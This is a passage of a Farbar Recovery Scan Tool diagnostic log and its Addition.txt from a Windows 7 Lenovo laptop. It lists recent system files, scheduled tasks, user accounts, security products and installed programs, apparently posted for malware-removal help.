2016-10-09 22:11 - 2016-06-14 07:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-10-09 22:11 - 2016-06-14 07:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2016-10-09 22:11 - 2016-06-14 05:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2016-10-09 22:11 - 2016-06-14 05:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-10-09 22:11 - 2016-06-14 05:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-10-09 22:11 - 2016-06-14 05:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-10-09 22:11 - 2016-06-14 05:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-10-09 22:11 - 2016-06-14 05:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-10-09 22:11 - 2016-06-14 05:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-10-09 22:11 - 2016-06-14 05:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2016-10-09 22:11 - 2016-06-14 05:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2016-09-27 23:41 - 2016-09-28 00:49 - 00000000 ____D C:\Users\Wayne\Desktop\tabieats
2016-09-25 10:52 - 2016-09-25 10:52 - 00000259 _____ C:\Users\Wayne\Desktop\Directions for Archiving (Dubbing) From VHS Tape to DVD Disc - ArchivingCartDirections.pdf.URL
2016-09-25 10:50 - 2016-09-25 10:50 - 00000266 _____ C:\Users\Wayne\Desktop\How to convert video to DVD convert VHS to digital - How-To - PC Advisor.URL
2016-09-25 10:45 - 2016-09-25 10:45 - 00709731 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD_ A First-Hand Experience _ explora.pdf
2016-09-25 10:40 - 2016-09-25 10:40 - 00000303 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD A First-Hand Experience explora.URL
2016-09-25 10:40 - 2016-08-12 06:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-09-25 10:40 - 2016-08-12 06:26 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-09-25 10:40 - 2016-08-12 06:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-09-25 10:33 - 2016-08-16 07:36 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-09-25 10:33 - 2016-08-15 16:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-09-25 10:33 - 2016-08-06 05:31 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-09-25 10:33 - 2016-08-06 05:15 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-09-25 10:27 - 2016-09-25 10:27 - 00000383 _____ C:\Users\Wayne\Desktop\why does recording stop when copying vhs tape with many recording segments - Google Search.URL
2016-09-25 10:27 - 2016-09-25 10:27 - 00000243 _____ C:\Users\Wayne\Desktop\VHS to DVD Copy Keeps Stopping - Club Myce.URL

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-21 21:12 - 2011-11-11 17:49 - 00003488 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2016-10-21 21:12 - 2011-11-11 17:49 - 00003448 _____ C:\Windows\System32\Tasks\PCDEventLauncher
2016-10-21 21:12 - 2011-11-11 17:49 - 00000528 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2016-10-21 21:12 - 2011-11-11 17:49 - 00000466 _____ C:\Windows\Tasks\SystemToolsDailyTest.job
2016-10-21 21:10 - 2011-10-23 13:51 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-21 21:10 - 2011-10-23 13:51 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-10-21 21:08 - 2013-09-01 11:09 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-10-21 20:58 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-21 20:58 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-21 20:50 - 2009-07-13 19:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-20 23:29 - 2016-07-31 20:40 - 00000162 _____ C:\Users\Wayne\Desktop\Things You Should Know for a Floor Tile Installation Project - YouTube.URL
2016-10-20 22:45 - 2016-03-06 11:09 - 00000243 _____ C:\Users\Wayne\Desktop\lenovo x220 display port - Google Search.URL
2016-10-20 22:39 - 2013-03-30 18:24 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-10-20 22:22 - 2016-04-10 13:41 - 00000224 _____ C:\Users\Wayne\Desktop\Adobe - Flash Player.URL
2016-10-20 21:14 - 2014-12-29 11:18 - 00002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-10-20 20:52 - 2016-04-28 18:44 - 00000000 ____D C:\QUARANTINE
2016-10-20 20:41 - 2015-04-11 13:30 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-10-18 20:07 - 2009-07-13 19:13 - 00782510 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-18 20:07 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\inf
2016-10-15 16:43 - 2011-10-23 13:23 - 00000000 ____D C:\ProgramData\Lenovo
2016-10-15 16:34 - 2016-07-23 01:01 - 00000984 _____ C:\Users\Wayne\Desktop\PotPlayer 64 bit.lnk
2016-10-15 16:07 - 2013-09-01 11:42 - 00000000 ____D C:\Windows\System32\Tasks\TVT
2016-10-15 16:06 - 2011-10-23 13:43 - 00000000 ___HD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo ThinkVantage Tools
2016-10-15 16:06 - 2011-10-23 13:42 - 00000000 ____D C:\Program Files (x86)\Lenovo
2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-10-15 15:53 - 2009-07-13 18:45 - 00408216 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-15 15:41 - 2013-09-01 10:57 - 00000000 ____D C:\Windows\system32\MRT
2016-10-15 15:32 - 2011-11-19 20:17 - 143495576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-10-15 15:31 - 2013-03-30 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-15 15:08 - 2014-09-20 21:04 - 00000000 ____D C:\Users\Wayne\AppData\Local\Adobe
2016-10-15 15:08 - 2013-09-01 11:09 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-10-15 15:07 - 2012-04-25 21:53 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-10-15 15:07 - 2011-11-19 20:14 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\system32\Macromed
2016-10-15 14:59 - 2013-10-10 21:12 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2016-10-15 14:58 - 2015-07-19 08:51 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-10-09 22:55 - 2014-12-29 10:58 - 00000000 ____D C:\Windows\system32\appraiser
2016-10-09 22:55 - 2014-05-24 17:12 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\system32\Dism
2016-10-09 22:20 - 2014-02-23 21:37 - 00775124 _____ C:\Windows\SysWOW64\PerfStringBackup.INI

==================== Files in the root of some directories =======

2014-07-09 13:01 - 2014-07-09 13:01 - 0022976 _____ (Intel Corporation) C:\Users\Wayne\AppData\Roaming\JomCap.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-05-12 20:50

==================== End of FRST.txt ============================

 

 

The contents of the Addition.txt file are:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (21-10-2016 22:03:45)
Running from C:\Users\Wayne\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2011-11-12 03:49:14)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3902107189-2783423906-2191778952-500 - Administrator - Disabled)
Guest (S-1-5-21-3902107189-2783423906-2191778952-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3902107189-2783423906-2191778952-1002 - Limited - Enabled)
Wayne (S-1-5-21-3902107189-2783423906-2191778952-1000 - Administrator - Enabled) => C:\Users\Wayne

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee VirusScan Enterprise (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee VirusScan Enterprise Antispyware Module (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.198 - Adobe Systems Incorporated)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.185 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.18) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.18 - Adobe Systems Incorporated)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.2 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
Conexant 20672 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.32.23.5 - Conexant)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Disable AMT Profile Synchronization Pop-up for Windows XP/Vista/7 (HKLM\...\DisableAMTPopup) (Version: 1.00 - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.71 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1011 - Intel Corporation)
Intel® Identity Protection Technology 1.2.32.0 (HKLM-x32\...\{2D793E41-F598-1014-9984-F3B169A93F79}) (Version: 1.2.32.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.1.80.1211 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Intel® Update Manager (x32 Version: 1.6.3.70 - Intel Corporation) Hidden
Intel® WiDi (HKLM\...\{F949AE30-83D1-41B2-92D2-F44478DD058A}) (Version: 4.2.24.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{a9888f41-68ae-43df-bd7d-d93405a44106}) (Version: 17.13.11 - Intel Corporation)
Java 7 Update 76 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217076FF}) (Version: 7.0.760 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 1.00 - )
Lenovo Patch Utility (HKLM-x32\...\{AD32F5E9-6BDD-480A-8B7B-95571D04691C}) (Version: 1.3.1.1 - Lenovo Group Limited)
Lenovo Patch Utility 64 bit (HKLM\...\{0369F866-2CE0-4EB9-B426-88FA122C6E82}) (Version: 1.3.0.9 - Lenovo Group Limited)
Lenovo Power Management Driver (Version: 1.67.12.16 - Lenovo) Hidden
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo Screen Reading Optimizer (HKLM-x32\...\{91A29166-4E1B-4664-B70B-4C4A3B6B3372}) (Version: 1.16 - Lenovo)
Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: 3.3.002.00 - Lenovo)
Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )
Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.07.0037 - Lenovo)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
Lenovo User Guide (HKLM-x32\...\{13F59938-C595-479C-B479-F171AB9AF64F}) (Version: 1.0.0008.00 - Lenovo)
Lenovo Warranty Information (HKLM-x32\...\{FD4EC278-C1B1-4496-99ED-C0BE1B0AA521}) (Version: 1.0.0005.00 - Lenovo)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
McAfee Agent (HKLM-x32\...\{EBF3D65F-011E-44D2-8F4F-C74B52682EDD}) (Version: 4.8.0.1500 - McAfee, Inc.)
McAfee VirusScan Enterprise (HKLM-x32\...\{CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF}) (Version: 8.8.06000 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM\...\{C2C2DB64-1BCE-4FA7-962D-457795ECCEC0}) (Version: 3.3.0004.00 - Lenovo Group Limited)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0006.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 49.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.2 (x86 en-US)) (Version: 49.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.2.6136 - Mozilla)
Mp3tag v2.71 (HKLM-x32\...\Mp3tag) (Version: v2.71 - Florian Heidenreich)
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.01 - )
Potplayer-64 bit (HKLM\...\PotPlayer64) (Version:  - Kakao Corp.)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.68.10 - Lenovo Group Limited)
RapidBoot (HKLM\...\{5E2652DF-743F-482B-A593-C95F431A5769}) (Version: 1.10 - Lenovo)
Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )
RICOH_Media_Driver_v2.13.18.02 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.13.18.02 - RICOH)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.42 - )
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)
ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.26.81 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.74 - Lenovo)
ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.11.0.0 - Lenovo)
VIPAccess (HKLM-x32\...\{E8D46836-CD55-453C-A107-A59EC51CB8DC}) (Version: 2.0.1.91 - VeriSign)
Windows Driver Package - Intel (e1cexpress) Net  (12/21/2010 11.8.84.0) (HKLM\...\6D23A494E9A245843FB8584D9307D3E328DF8613) (Version: 12/21/2010 11.8.84.0 - Intel)
Windows Driver Package - Intel (MEIx64) System  (10/19/2010 7.0.0.1144) (HKLM\...\90FD26A77B849AE03FF5F07A1CDA7F950406A8D8) (Version: 10/19/2010 7.0.0.1144 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\0CDBDD444A1F5FFEA227B4E7DCE195F11F08240A) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\A513FC5E5A08D4EF27F234E91E0E942A0234210B) (Version: 09/10/2010 9.2.0.1011 - Intel)
Windows Driver Package - Intel System  (10/04/2010 9.2.0.1015) (HKLM\...\FE1BEBFD475BB832AAF104F5C63348E98A9286DF) (Version: 10/04/2010 9.2.0.1015 - Intel)
Windows Driver Package - Intel USB  (09/16/2010 9.2.0.1013) (HKLM\...\D97688B8E3830BF9820E15EB8D9552DCBF988CFD) (Version: 09/16/2010 9.2.0.1013 - Intel)
Windows Driver Package - Lenovo 1.62.00.00 (01/19/2011 1.62.00.00) (HKLM\...\D01A7EE241898C810674C69EB908D655D149BE77) (Version: 01/19/2011 1.62.00.00 - Lenovo)
Windows Driver Package - Synaptics (SynTP) Mouse  (05/05/2011 15.3.6.0) (HKLM\...\C63C03BF3BE2B6F6204BB54541690449FFF79F4F) (Version: 05/05/2011 15.3.6.0 - Synaptics)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03F4E4A8-6650-450E-B602-7D6032954BD8} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)
Task: {127E1244-6272-4841-9A8E-A3B0A1E08CD4} - System32\Tasks\Lenovo\Message Center Plus Launcher => C:\Program Files (x86)\Lenovo\message center plus\mcplaunch.exe [2014-09-13] (Lenovo)
Task: {3C77B26C-534F-4613-A1E0-9147FA029E6E} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"
Task: {41254CBE-BE8E-4EBE-AE49-C2E30CA9947E} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {440D6F89-2BAA-4EC9-9C9D-8A3AE544B210} - System32\Tasks\Lenovo\LSC\LSCTaskService => C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCTaskService.exe
Task: {55FB8BD6-8C4C-4920-91B5-692D04045384} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {5EE08B5E-D6A7-4F92-904C-2E271853A892} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2016-04-14] (Lenovo Group Limited)
Task: {637CEB23-19E3-4FCF-B1D2-61109D529939} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
